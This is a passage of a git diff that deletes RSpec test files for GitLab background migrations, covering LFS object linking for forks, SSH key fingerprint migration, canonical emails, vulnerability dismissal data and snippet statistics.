fork_network_members.create!( - fork_network_id: fork_network.id, - project_id: p.id, - forked_from_project_id: fork_network.root_project_id - ) - end - - fork_network_members.create!(fork_network_id: another_fork_network.id, project_id: another_source_project.id, forked_from_project_id: nil) - fork_network_members.create!(fork_network_id: another_fork_network.id, project_id: another_project.id, forked_from_project_id: another_fork_network.root_project_id) - - # Links LFS objects to some projects - lfs_objects_projects.create!(lfs_object_id: lfs_object.id, project_id: fully_linked_project.id) - lfs_objects_projects.create!(lfs_object_id: another_lfs_object.id, project_id: fully_linked_project.id) - lfs_objects_projects.create!(lfs_object_id: lfs_object.id, project_id: partially_linked_project.id) - end - - context 'when there are LFS objects to be linked' do - it 'creates LfsObjectsProject records for forks based on the specified range of LfsObjectProject id' do - expect_next_instance_of(Gitlab::BackgroundMigration::Logger) do |logger| - expect(logger).to receive(:info).exactly(4).times - end - - expect { subject.perform(source_project_lop_1.id, another_source_project_lop_2.id) }.to change { lfs_objects_projects.count }.by(5) - - expect(lfs_object_ids_for(project)).to match_array(lfs_object_ids_for(source_project)) - expect(lfs_object_ids_for(another_project)).to match_array(lfs_object_ids_for(another_source_project)) - expect(lfs_object_ids_for(partially_linked_project)).to match_array(lfs_object_ids_for(source_project)) - - expect { subject.perform(source_project_lop_1.id, another_source_project_lop_2.id) }.not_to change { lfs_objects_projects.count } - end - end - - context 'when there are no LFS objects to be linked' do - before do - # Links LFS objects to all projects - projects.all.each do |p| - lfs_objects_projects.create!(lfs_object_id: lfs_object.id, project_id: p.id) - lfs_objects_projects.create!(lfs_object_id: another_lfs_object.id, project_id: p.id) - end - end - - it 'does not create LfsObjectProject records' do - expect { subject.perform(source_project_lop_1.id, another_source_project_lop_2.id) } - .not_to change { lfs_objects_projects.count } - end - end - - def lfs_object_ids_for(project) - lfs_objects_projects.where(project_id: project.id).pluck(:lfs_object_id) - end -end diff --git a/spec/lib/gitlab/background_migration/migrate_fingerprint_sha256_within_keys_spec.rb b/spec/lib/gitlab/background_migration/migrate_fingerprint_sha256_within_keys_spec.rb deleted file mode 100644 index 4287d6723cf..00000000000 --- a/spec/lib/gitlab/background_migration/migrate_fingerprint_sha256_within_keys_spec.rb +++ /dev/null @@ -1,93 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::MigrateFingerprintSha256WithinKeys, schema: 20181228175414 do - subject(:fingerprint_migrator) { described_class.new } - - let(:key_table) { table(:keys) } - - before do - generate_fingerprints! - end - - it 'correctly creates a sha256 fingerprint for a key' do - key_1 = Key.find(1017) - key_2 = Key.find(1027) - - expect(key_1.fingerprint_md5).to eq('ba:81:59:68:d7:6c:cd:02:02:bf:6a:9b:55:4e:af:d1') - expect(key_1.fingerprint_sha256).to eq(nil) - - expect(key_2.fingerprint_md5).to eq('39:e3:64:a6:24:ea:45:a2:8c:55:2a:e9:4d:4f:1f:b4') - expect(key_2.fingerprint_sha256).to eq(nil) - - query_count = ActiveRecord::QueryRecorder.new do - fingerprint_migrator.perform(1, 10000) - end.count - - expect(query_count).to eq(8) - - key_1.reload - key_2.reload - - expect(key_1.fingerprint_md5).to eq('ba:81:59:68:d7:6c:cd:02:02:bf:6a:9b:55:4e:af:d1') - expect(key_1.fingerprint_sha256).to eq('nUhzNyftwADy8AH3wFY31tAKs7HufskYTte2aXo/lCg') - - expect(key_2.fingerprint_md5).to eq('39:e3:64:a6:24:ea:45:a2:8c:55:2a:e9:4d:4f:1f:b4') - expect(key_2.fingerprint_sha256).to eq('zMNbLekgdjtcgDv8VSC0z5lpdACMG3Q4PUoIz5+H2jM') - end - - context 'with invalid keys' do - before do - key = Key.find(1017) - # double space after "ssh-rsa" leads to a - # OpenSSL::PKey::PKeyError in Net::SSH::KeyFactory.load_data_public_key - key.update_column(:key, key.key.gsub('ssh-rsa ', 'ssh-rsa ')) - end - - it 'ignores errors and does not set the fingerprint' do - fingerprint_migrator.perform(1, 10000) - - key_1 = Key.find(1017) - key_2 = Key.find(1027) - - expect(key_1.fingerprint_sha256).to be_nil - expect(key_2.fingerprint_sha256).not_to be_nil - end - end - - it 'migrates all keys' do - expect(Key.where(fingerprint_sha256: nil).count).to eq(Key.all.count) - - fingerprint_migrator.perform(1, 10000) - - expect(Key.where(fingerprint_sha256: nil).count).to eq(0) - end - - def generate_fingerprints! - values = "" - (1000..2000).to_a.each do |record| - key = base_key_for(record) - fingerprint = fingerprint_for(key) - - values += "(#{record}, #{record}, 'test-#{record}', '#{key}', '#{fingerprint}')," - end - - update_query = <<~SQL - INSERT INTO keys ( id, user_id, title, key, fingerprint ) - VALUES - #{values.chomp(",")}; - SQL - - ActiveRecord::Base.connection.execute(update_query) - end - - def base_key_for(record) - 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt0000k6YjzGGphH2TUxwKzxcKDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQaSeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=' - .gsub("0000", "%04d" % (record - 1)) # generate arbitrary keys with placeholder 0000 within the key above - end - - def fingerprint_for(key) - Gitlab::SSHPublicKey.new(key).fingerprint("md5") - end -end diff --git a/spec/lib/gitlab/background_migration/migrate_pages_metadata_spec.rb b/spec/lib/gitlab/background_migration/migrate_pages_metadata_spec.rb deleted file mode 100644 index b6d93b9ff54..00000000000 --- a/spec/lib/gitlab/background_migration/migrate_pages_metadata_spec.rb +++ /dev/null @@ -1,36 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::MigratePagesMetadata, schema: 20181228175414 do - let(:projects) { table(:projects) } - - subject(:migrate_pages_metadata) { described_class.new } - - describe '#perform' do - let(:namespaces) { table(:namespaces) } - let(:builds) { table(:ci_builds) } - let(:pages_metadata) { table(:project_pages_metadata) } - - it 'marks specified projects with successful pages deployment' do - namespace = namespaces.create!(name: 'gitlab', path: 'gitlab-org') - not_migrated_with_pages = projects.create!(namespace_id: namespace.id, name: 'Not Migrated With Pages') - builds.create!(project_id: not_migrated_with_pages.id, type: 'GenericCommitStatus', status: 'success', stage: 'deploy', name: 'pages:deploy') - - migrated = projects.create!(namespace_id: namespace.id, name: 'Migrated') - pages_metadata.create!(project_id: migrated.id, deployed: true) - - not_migrated_no_pages = projects.create!(namespace_id: namespace.id, name: 'Not Migrated No Pages') - project_not_in_relation_scope = projects.create!(namespace_id: namespace.id, name: 'Other') - - ids = [not_migrated_no_pages.id, not_migrated_with_pages.id, migrated.id] - - migrate_pages_metadata.perform(ids.min, ids.max) - - expect(pages_metadata.find_by_project_id(not_migrated_with_pages.id).deployed).to eq(true) - expect(pages_metadata.find_by_project_id(not_migrated_no_pages.id).deployed).to eq(false) - expect(pages_metadata.find_by_project_id(migrated.id).deployed).to eq(true) - expect(pages_metadata.find_by_project_id(project_not_in_relation_scope.id)).to be_nil - end - end -end diff --git a/spec/lib/gitlab/background_migration/migrate_to_hashed_storage_spec.rb b/spec/lib/gitlab/background_migration/migrate_to_hashed_storage_spec.rb deleted file mode 100644 index 0f7bb06e830..00000000000 --- a/spec/lib/gitlab/background_migration/migrate_to_hashed_storage_spec.rb +++ /dev/null @@ -1,43 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -# rubocop:disable RSpec/FactoriesInMigrationSpecs -RSpec.describe Gitlab::BackgroundMigration::MigrateToHashedStorage, :sidekiq, :redis do - let(:migrator) { Gitlab::HashedStorage::Migrator.new } - - subject(:background_migration) { described_class.new } - - describe '#perform' do - let!(:project) { create(:project, :empty_repo, :legacy_storage) } - - context 'with pending rollback' do - it 'aborts rollback operation' do - Sidekiq::Testing.disable! do - Sidekiq::Client.push( - 'queue' => ::HashedStorage::ProjectRollbackWorker.queue, - 'class' => ::HashedStorage::ProjectRollbackWorker, - 'args' => [project.id] - ) - - expect { background_migration.perform }.to change { migrator.rollback_pending? }.from(true).to(false) - end - end - end - - it 'enqueues legacy projects to be migrated' do - Sidekiq::Testing.fake! do - expect { background_migration.perform }.to change { Sidekiq::Queues[::HashedStorage::MigratorWorker.queue].size }.by(1) - end - end - - context 'when executing all jobs' do - it 'migrates legacy projects' do - Sidekiq::Testing.inline! do - expect { background_migration.perform }.to change { project.reload.legacy_storage? }.from(true).to(false) - end - end - end - end -end -# rubocop:enable RSpec/FactoriesInMigrationSpecs diff --git a/spec/lib/gitlab/background_migration/populate_canonical_emails_spec.rb b/spec/lib/gitlab/background_migration/populate_canonical_emails_spec.rb deleted file mode 100644 index 944ee98ed4a..00000000000 --- a/spec/lib/gitlab/background_migration/populate_canonical_emails_spec.rb +++ /dev/null @@ -1,94 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::PopulateCanonicalEmails, :migration, schema: 20181228175414 do - let(:migration) { described_class.new } - - let_it_be(:users_table) { table(:users) } - let_it_be(:user_canonical_emails_table) { table(:user_canonical_emails) } - - let_it_be(:users) { users_table.all } - let_it_be(:user_canonical_emails) { user_canonical_emails_table.all } - - subject { migration.perform(1, 1) } - - describe 'gmail users' do - using RSpec::Parameterized::TableSyntax - - where(:original_email, :expected_result) do - 'legitimateuser@gmail.com' | 'legitimateuser@gmail.com' - 'userwithplus+somestuff@gmail.com' | 'userwithplus@gmail.com' - 'user.with.periods@gmail.com' | 'userwithperiods@gmail.com' - 'user.with.periods.and.plus+someotherstuff@gmail.com' | 'userwithperiodsandplus@gmail.com' - end - - with_them do - it 'generates the correct canonical email' do - create_user(email: original_email, id: 1) - - subject - - result = canonical_emails - expect(result.count).to eq 1 - expect(result.first).to match({ - 'user_id' => 1, - 'canonical_email' => expected_result - }) - end - end - end - - describe 'non gmail.com domain users' do - %w[ - legitimateuser@somedomain.com - userwithplus+somestuff@other.com - user.with.periods@gmail.org - user.with.periods.and.plus+someotherstuff@orangmail.com - ].each do |non_gmail_address| - it 'does not generate a canonical email' do - create_user(email: non_gmail_address, id: 1) - - subject - - expect(canonical_emails(user_id: 1).count).to eq 0 - end - end - end - - describe 'gracefully handles missing records' do - specify { expect { subject }.not_to raise_error } - end - - describe 'gracefully handles existing records, some of which may have an already-existing identical canonical_email field' do - let_it_be(:user_one) { create_user(email: "example.user@gmail.com", id: 1) } - let_it_be(:user_two) { create_user(email: "exampleuser@gmail.com", id: 2) } - let_it_be(:user_email_one) { user_canonical_emails.create!(canonical_email: "exampleuser@gmail.com", user_id: user_one.id) } - - subject { migration.perform(1, 2) } - - it 'only creates one record' do - subject - - expect(canonical_emails.count).not_to be_nil - end - end - - def create_user(attributes) - default_attributes = { - projects_limit: 0 - } - - users.create!(default_attributes.merge!(attributes)) - end - - def canonical_emails(user_id: nil) - filter_by_id = user_id ? "WHERE user_id = #{user_id}" : "" - - ApplicationRecord.connection.execute <<~SQL - SELECT canonical_email, user_id - FROM user_canonical_emails - #{filter_by_id}; - SQL - end -end diff --git a/spec/lib/gitlab/background_migration/populate_dismissed_state_for_vulnerabilities_spec.rb b/spec/lib/gitlab/background_migration/populate_dismissed_state_for_vulnerabilities_spec.rb deleted file mode 100644 index dc8c8c75b83..00000000000 --- a/spec/lib/gitlab/background_migration/populate_dismissed_state_for_vulnerabilities_spec.rb +++ /dev/null @@ -1,44 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe ::Gitlab::BackgroundMigration::PopulateDismissedStateForVulnerabilities, schema: 20181228175414 do - let(:users) { table(:users) } - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - let(:vulnerabilities) { table(:vulnerabilities) } - - let!(:namespace) { namespaces.create!(name: "foo", path: "bar") } - let!(:user) { users.create!(name: 'John Doe', email: 'test@example.com', projects_limit: 5) } - let!(:project) { projects.create!(namespace_id: namespace.id) } - let!(:vulnerability_params) do - { - project_id: project.id, - author_id: user.id, - title: 'Vulnerability', - severity: 5, - confidence: 5, - report_type: 5 - } - end - - let!(:vulnerability_1) { vulnerabilities.create!(vulnerability_params.merge(state: 1)) } - let!(:vulnerability_2) { vulnerabilities.create!(vulnerability_params.merge(state: 3)) } - - describe '#perform' do - it 'changes state of vulnerability to dismissed' do - subject.perform(vulnerability_1.id, vulnerability_2.id) - - expect(vulnerability_1.reload.state).to eq(2) - expect(vulnerability_2.reload.state).to eq(2) - end - - it 'populates missing dismissal information' do - expect_next_instance_of(::Gitlab::BackgroundMigration::PopulateMissingVulnerabilityDismissalInformation) do |migration| - expect(migration).to receive(:perform).with(vulnerability_1.id, vulnerability_2.id) - end - - subject.perform(vulnerability_1.id, vulnerability_2.id) - end - end -end diff --git a/spec/lib/gitlab/background_migration/populate_has_vulnerabilities_spec.rb b/spec/lib/gitlab/background_migration/populate_has_vulnerabilities_spec.rb deleted file mode 100644 index 6722321d5f7..00000000000 --- a/spec/lib/gitlab/background_migration/populate_has_vulnerabilities_spec.rb +++ /dev/null @@ -1,63 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::PopulateHasVulnerabilities, schema: 20181228175414 do - let(:users) { table(:users) } - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - let(:project_settings) { table(:project_settings) } - let(:vulnerabilities) { table(:vulnerabilities) } - - let(:user) { users.create!(name: 'test', email: 'test@example.com', projects_limit: 5) } - let(:namespace) { namespaces.create!(name: 'gitlab', path: 'gitlab-org') } - let(:vulnerability_base_params) { { title: 'title', state: 2, severity: 0, confidence: 5, report_type: 2, author_id: user.id } } - - let!(:project_1) { projects.create!(namespace_id: namespace.id, name: 'foo_1') } - let!(:project_2) { projects.create!(namespace_id: namespace.id, name: 'foo_2') } - let!(:project_3) { projects.create!(namespace_id: namespace.id, name: 'foo_3') } - - before do - project_settings.create!(project_id: project_1.id) - vulnerabilities.create!(vulnerability_base_params.merge(project_id: project_1.id)) - vulnerabilities.create!(vulnerability_base_params.merge(project_id: project_3.id)) - - allow(::Gitlab::BackgroundMigration::Logger).to receive_messages(info: true, error: true) - end - - describe '#perform' do - it 'sets `has_vulnerabilities` attribute of project_settings' do - expect { subject.perform(project_1.id, project_3.id) }.to change { project_settings.count }.from(1).to(2) - .and change { project_settings.where(has_vulnerabilities: true).count }.from(0).to(2) - end - - it 'writes info log message' do - subject.perform(project_1.id, project_3.id) - - expect(::Gitlab::BackgroundMigration::Logger).to have_received(:info).with(migrator: described_class.name, - message: 'Projects has been processed to populate `has_vulnerabilities` information', - count: 2) - end - - context 'when non-existing project_id is given' do - it 'populates only for the existing projects' do - expect { subject.perform(project_1.id, 0, project_3.id) }.to change { project_settings.count }.from(1).to(2) - .and change { project_settings.where(has_vulnerabilities: true).count }.from(0).to(2) - end - end - - context 'when an error happens' do - before do - allow(described_class::ProjectSetting).to receive(:upsert_for).and_raise('foo') - end - - it 'writes error log message' do - subject.perform(project_1.id, project_3.id) - - expect(::Gitlab::BackgroundMigration::Logger).to have_received(:error).with(migrator: described_class.name, - message: 'foo', - project_ids: [project_1.id, project_3.id]) - end - end - end -end diff --git a/spec/lib/gitlab/background_migration/populate_merge_request_assignees_table_spec.rb b/spec/lib/gitlab/background_migration/populate_merge_request_assignees_table_spec.rb deleted file mode 100644 index 1d8eed53553..00000000000 --- a/spec/lib/gitlab/background_migration/populate_merge_request_assignees_table_spec.rb +++ /dev/null @@ -1,70 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::PopulateMergeRequestAssigneesTable, schema: 20181228175414 do - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - let(:users) { table(:users) } - - let(:user) { users.create!(email: 'test@example.com', projects_limit: 100, username: 'test') } - let(:user_2) { users.create!(email: 'test2@example.com', projects_limit: 100, username: 'test') } - let(:user_3) { users.create!(email: 'test3@example.com', projects_limit: 100, username: 'test') } - - let(:namespace) { namespaces.create!(name: 'gitlab', path: 'gitlab-org') } - let(:project) { projects.create!(namespace_id: namespace.id, name: 'foo') } - let(:merge_requests) { table(:merge_requests) } - let(:merge_request_assignees) { table(:merge_request_assignees) } - - def create_merge_request(id, params = {}) - params.merge!(id: id, - target_project_id: project.id, - target_branch: 'master', - source_project_id: project.id, - source_branch: 'mr name', - title: "mr name#{id}") - - merge_requests.create!(params) - end - - before do - create_merge_request(2, assignee_id: user.id) - create_merge_request(3, assignee_id: user_2.id) - create_merge_request(4, assignee_id: user_3.id) - - # Test filtering MRs without assignees - create_merge_request(5, assignee_id: nil) - # Test filtering already migrated row - merge_request_assignees.create!(merge_request_id: 2, user_id: user_3.id) - end - - describe '#perform' do - it 'creates merge_request_assignees rows according to merge_requests' do - subject.perform(1, 4) - - rows = merge_request_assignees.order(:id).map { |row| row.attributes.slice('merge_request_id', 'user_id') } - existing_rows = [ - { 'merge_request_id' => 2, 'user_id' => user_3.id } - ] - created_rows = [ - { 'merge_request_id' => 3, 'user_id' => user_2.id }, - { 'merge_request_id' => 4, 'user_id' => user_3.id } - ] - expected_rows = existing_rows + created_rows - - expect(rows.size).to eq(expected_rows.size) - expected_rows.each do |expected_row| - expect(rows).to include(expected_row) - end - end - end - - describe '#perform_all_sync' do - it 'executes peform for all merge requests in batches' do - expect(subject).to receive(:perform).with(2, 4).ordered - expect(subject).to receive(:perform).with(5, 5).ordered - - subject.perform_all_sync(batch_size: 3) - end - end -end diff --git a/spec/lib/gitlab/background_migration/populate_missing_vulnerability_dismissal_information_spec.rb b/spec/lib/gitlab/background_migration/populate_missing_vulnerability_dismissal_information_spec.rb deleted file mode 100644 index 1c987d3876f..00000000000 --- a/spec/lib/gitlab/background_migration/populate_missing_vulnerability_dismissal_information_spec.rb +++ /dev/null @@ -1,65 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::PopulateMissingVulnerabilityDismissalInformation, schema: 20181228175414 do - let(:users) { table(:users) } - let(:namespaces) { table(:namespaces) } - let(:projects) { table(:projects) } - let(:vulnerabilities) { table(:vulnerabilities) } - let(:findings) { table(:vulnerability_occurrences) } - let(:scanners) { table(:vulnerability_scanners) } - let(:identifiers) { table(:vulnerability_identifiers) } - let(:feedback) { table(:vulnerability_feedback) } - - let(:user) { users.create!(name: 'test', email: 'test@example.com', projects_limit: 5) } - let(:namespace) { namespaces.create!(name: 'gitlab', path: 'gitlab-org') } - let(:project) { projects.create!(namespace_id: namespace.id, name: 'foo') } - let(:vulnerability_1) { vulnerabilities.create!(title: 'title', state: 2, severity: 0, confidence: 5, report_type: 2, project_id: project.id, author_id: user.id) } - let(:vulnerability_2) { vulnerabilities.create!(title: 'title', state: 2, severity: 0, confidence: 5, report_type: 2, project_id: project.id, author_id: user.id) } - let(:scanner) { scanners.create!(project_id: project.id, external_id: 'foo', name: 'bar') } - let(:identifier) { identifiers.create!(project_id: project.id, fingerprint: 'foo', external_type: 'bar', external_id: 'zoo', name: 'identifier') } - - before do - feedback.create!(feedback_type: 0, - category: 'sast', - project_fingerprint: '418291a26024a1445b23fe64de9380cdcdfd1fa8', - project_id: project.id, - author_id: user.id, - created_at: Time.current) - - findings.create!(name: 'Finding', - report_type: 'sast', - project_fingerprint: Gitlab::Database::ShaAttribute.new.serialize('418291a26024a1445b23fe64de9380cdcdfd1fa8'), - location_fingerprint: 'bar', - severity: 1, - confidence: 1, - metadata_version: 1, - raw_metadata: '', - uuid: SecureRandom.uuid, - project_id: project.id, - vulnerability_id: vulnerability_1.id, - scanner_id: scanner.id, - primary_identifier_id: identifier.id) - - allow(::Gitlab::BackgroundMigration::Logger).to receive_messages(info: true, warn: true, error: true) - end - - describe '#perform' do - it 'updates the missing dismissal information of the vulnerability' do - expect { subject.perform(vulnerability_1.id, vulnerability_2.id) }.to change { vulnerability_1.reload.dismissed_at }.from(nil) - .and change { vulnerability_1.reload.dismissed_by_id }.from(nil).to(user.id) - end - - it 'writes log messages' do - subject.perform(vulnerability_1.id, vulnerability_2.id) - - expect(::Gitlab::BackgroundMigration::Logger).to have_received(:info).with(migrator: described_class.name, - message: 'Dismissal information has been copied', - count: 2) - expect(::Gitlab::BackgroundMigration::Logger).to have_received(:warn).with(migrator: described_class.name, - message: 'Could not update vulnerability!', - vulnerability_id: vulnerability_2.id) - end - end -end diff --git a/spec/lib/gitlab/background_migration/populate_personal_snippet_statistics_spec.rb b/spec/lib/gitlab/background_migration/populate_personal_snippet_statistics_spec.rb deleted file mode 100644 index f9628849dbf..00000000000 --- a/spec/lib/gitlab/background_migration/populate_personal_snippet_statistics_spec.rb +++ /dev/null @@ -1,141 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::PopulatePersonalSnippetStatistics do - let(:file_name) { 'file_name.rb' } - let(:content) { 'content' } - let(:snippets) { table(:snippets) } - let(:snippet_repositories) { table(:snippet_repositories) } - let(:users) { table(:users) } - let(:namespaces) { table(:namespaces) } - let(:snippet_statistics) { table(:snippet_statistics) } - let(:namespace_statistics) { table(:namespace_root_storage_statistics) } - let(:routes) { table(:routes) } - let(:repo_size) { 123456 } - let(:expected_repo_size) { repo_size.megabytes } - - let(:user1) { users.create!(id: 1, email: 'test@example.com', projects_limit: 100, username: 'test1') } - let(:user2) { users.create!(id: 2, email: 'test2@example.com', projects_limit: 100, username: 'test2') } - let!(:user1_namespace) { namespaces.create!(id: 1, name: 'user1', path: 'user1', owner_id: user1.id) } - let!(:user2_namespace) { namespaces.create!(id: 2, name: 'user2', path: 'user2', owner_id: user2.id) } - let(:user1_namespace_statistics) { namespace_statistics.find_by(namespace_id: user1_namespace.id) } - let(:user2_namespace_statistics) { namespace_statistics.find_by(namespace_id: user2_namespace.id) } - - let(:ids) { snippets.pluck(:id) } - let(:migration) { described_class.new } - - subject do - migration.perform(ids) - end - - before do - allow_any_instance_of(Repository).to receive(:size).and_return(repo_size) - end - - after do - snippets.all.each { |s| raw_repository(s).remove } - end - - context 'with existing personal snippets' do - let!(:snippet1) { create_snippet(1, user1) } - let!(:snippet2) { create_snippet(2, user1) } - let!(:snippet3) { create_snippet(3, user2) } - let!(:snippet4) { create_snippet(4, user2) } - - before do - create_snippet_statistics(2, 0) - create_snippet_statistics(4, 123) - end - - it 'creates/updates all snippet_statistics' do - expect { subject }.to change { snippet_statistics.count }.from(2).to(4) - - expect(snippet_statistics.pluck(:repository_size)).to be_all(expected_repo_size) - end - - it 'creates/updates the associated namespace statistics' do - expect(migration).to receive(:update_namespace_statistics).twice.and_call_original - - subject - - stats = snippet_statistics.where(snippet_id: [snippet1, snippet2]).sum(:repository_size) - expect(user1_namespace_statistics.snippets_size).to eq stats - - stats = snippet_statistics.where(snippet_id: [snippet3, snippet4]).sum(:repository_size) - expect(user2_namespace_statistics.snippets_size).to eq stats - end - - context 'when an error is raised when updating a namespace statistics' do - it 'logs the error and continue execution' do - expect_next_instance_of(Namespaces::StatisticsRefresherService) do |instance| - expect(instance).to receive(:execute).with(Namespace.find(user1_namespace.id)).and_raise('Error') - end - - expect_next_instance_of(Namespaces::StatisticsRefresherService) do |instance| - expect(instance).to receive(:execute).and_call_original - end - - expect_next_instance_of(Gitlab::BackgroundMigration::Logger) do |instance| - expect(instance).to receive(:error).with(message: /Error updating statistics for namespace/).once - end - - subject - - expect(user1_namespace_statistics).to be_nil - - stats = snippet_statistics.where(snippet_id: [snippet3, snippet4]).sum(:repository_size) - expect(user2_namespace_statistics.snippets_size).to eq stats - end - end - end - - context 'when a snippet repository is empty' do - let!(:snippet1) { create_snippet(1, user1, with_repo: false) } - let!(:snippet2) { create_snippet(2, user1) } - - it 'logs error and continues execution' do - expect_next_instance_of(Gitlab::BackgroundMigration::Logger) do |instance| - expect(instance).to receive(:error).with(message: /Invalid snippet repository/).once - end - - subject - - expect(snippet_statistics.find_by(snippet_id: snippet1.id)).to be_nil - expect(user1_namespace_statistics.snippets_size).to eq expected_repo_size - end - end - - def create_snippet(id, author, with_repo: true) - snippets.create!(id: id, type: 'PersonalSnippet', author_id: author.id, file_name: file_name, content: content).tap do |snippet| - if with_repo - allow(snippet).to receive(:disk_path).and_return(disk_path(snippet)) - - raw_repository(snippet).create_repository - - TestEnv.copy_repo(snippet, - bare_repo: TestEnv.factory_repo_path_bare, - refs: TestEnv::BRANCH_SHA) - end - end - end - - def create_snippet_statistics(snippet_id, repository_size = 0) - snippet_statistics.create!(snippet_id: snippet_id, repository_size: repository_size) - end - - def raw_repository(snippet) - Gitlab::Git::Repository.new('default', - "#{disk_path(snippet)}.git", - Gitlab::GlRepository::SNIPPET.identifier_for_container(snippet), - "@snippets/#{snippet.id}") - end - - def hashed_repository(snippet) - Storage::Hashed.new(snippet, prefix: '@snippets') - end - - def disk_path(snippet) - hashed_repository(snippet).disk_path - end -end diff --git a/spec/lib/gitlab/background_migration/populate_project_snippet_statistics_spec.rb b/spec/lib/gitlab/background_migration/populate_project_snippet_statistics_spec.rb deleted file mode 100644 index 7884e0d97c0..00000000000 --- a/spec/lib/gitlab/background_migration/populate_project_snippet_statistics_spec.rb +++ /dev/null @@ -1,224 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::BackgroundMigration::PopulateProjectSnippetStatistics do - let(:file_name) { 'file_name.rb' } - let(:content) { 'content' } - let(:snippets) { table(:snippets) } - let(:snippet_repositories) { table(:snippet_repositories) } - let(:users) { table(:users) } - let(:namespaces) { table(:namespaces) } - let(:snippet_statistics) { table(:snippet_statistics) } - let(:project_statistics) { table(:project_statistics) } - let(:projects) { table(:projects) } - let(:namespace_statistics) { table(:namespace_root_storage_statistics) } - let(:routes) { table(:routes) } - let(:repo_size) { 123456 } - let(:expected_repo_size) { repo_size.megabytes } - - let(:user) { users.create!(id: 1, email: 'test@example.com', projects_limit: 100, username: 'test') } - let(:group) { namespaces.create!(id: 10, type: 'Group', name: 'group1', path: 'group1') } - let(:user_namespace) { namespaces.create!(id: 20, name: 'user', path: 'user', owner_id: user.id) } - - let(:project1) { create_project(1, 'test', group) } - let(:project2) { create_project(2, 'test1', user_namespace) } - let(:project3) { create_project(3, 'test2', group) } - - let!(:project_stats1) { create_project_statistics(project1) } - let!(:project_stats2) { create_project_statistics(project2) } - let!(:project_stats3) { create_project_statistics(project3) } - - let(:ids) { snippets.pluck(:id) } - let(:migration) { described_class.new } - - subject do - migration.perform(ids) - - project_stats1.reload if project_stats1.persisted? - project_stats2.reload if project_stats2.persisted? - project_stats3.reload if project_stats3.persisted? - end - - before do - allow_any_instance_of(Repository).to receive(:size).and_return(repo_size) - end - - after do - snippets.all.each { |s| raw_repository(s).remove } - end - - context 'with existing user and group snippets' do - let!(:snippet1) { create_snippet(1, project1) } - let!(:snippet2) { create_snippet(2, project1) } - let!(:snippet3) { create_snippet(3, project2) } - let!(:snippet4) { create_snippet(4, project2) } - let!(:snippet5) { create_snippet(5, project3) } - - before do - create_snippet_statistics(2, 0) - create_snippet_statistics(4, 123) - end - - it 'creates/updates all snippet_statistics' do - expect(snippet_statistics.count).to eq 2 - - subject - - expect(snippet_statistics.count).to eq 5 - - snippet_statistics.all.each do |stat| - expect(stat.repository_size).to eq expected_repo_size - end - end - - it 'updates associated snippet project statistics' do - expect(project_stats1.snippets_size).to be_nil - expect(project_stats2.snippets_size).to be_nil - - subject - - snippets_size = snippet_statistics.where(snippet_id: [snippet1.id, snippet2.id]).sum(:repository_size) - expect(project_stats1.snippets_size).to eq snippets_size - - snippets_size = snippet_statistics.where(snippet_id: [snippet3.id, snippet4.id]).sum(:repository_size) - expect(project_stats2.snippets_size).to eq snippets_size - - snippets_size = snippet_statistics.where(snippet_id: snippet5.id).sum(:repository_size) - expect(project_stats3.snippets_size).to eq snippets_size - end - - it 'forces the project statistics refresh' do - expect(migration).to receive(:update_project_statistics).exactly(3).times - - subject - end - - it 'creates/updates the associated namespace statistics' do - expect(migration).to receive(:update_namespace_statistics).twice.and_call_original - - subject - - expect(namespace_statistics.find_by(namespace_id: group.id).snippets_size).to eq project_stats1.snippets_size + project_stats3.snippets_size - expect(namespace_statistics.find_by(namespace_id: user_namespace.id).snippets_size).to eq project_stats2.snippets_size - end - - context 'when the project statistics does not exists' do - it 'does not raise any error' do - project_stats3.delete - - subject - - expect(namespace_statistics.find_by(namespace_id: group.id).snippets_size).to eq project_stats1.snippets_size - expect(namespace_statistics.find_by(namespace_id: user_namespace.id).snippets_size).to eq project_stats2.snippets_size - end - end - - context 'when an error is raised when updating a project statistics' do - it 'logs the error and continue execution' do - expect(migration).to receive(:update_project_statistics).with(Project.find(project1.id)).and_raise('Error') - expect(migration).to receive(:update_project_statistics).with(Project.find(project2.id)).and_call_original - expect(migration).to receive(:update_project_statistics).with(Project.find(project3.id)).and_call_original - - expect_next_instance_of(Gitlab::BackgroundMigration::Logger) do |instance| - expect(instance).to receive(:error).with(message: /Error updating statistics for project #{project1.id}/).once - end - - subject - - expect(project_stats2.snippets_size).not_to be_nil - expect(project_stats3.snippets_size).not_to be_nil - end - end - - context 'when an error is raised when updating a namespace statistics' do - it 'logs the error and continue execution' do - expect(migration).to receive(:update_namespace_statistics).with(Group.find(group.id)).and_raise('Error') - expect(migration).to receive(:update_namespace_statistics).with(Namespace.find(user_namespace.id)).and_call_original - - expect_next_instance_of(Gitlab::BackgroundMigration::Logger) do |instance| - expect(instance).to receive(:error).with(message: /Error updating statistics for namespace/).once - end - - subject - - expect(namespace_statistics.find_by(namespace_id: user_namespace.id).snippets_size).to eq project_stats2.snippets_size - end - end - end - - context 'when project snippet is in a subgroup' do - let(:subgroup) { namespaces.create!(id: 30, type: 'Group', name: 'subgroup', path: 'subgroup', parent_id: group.id) } - let(:project1) { create_project(1, 'test', subgroup, 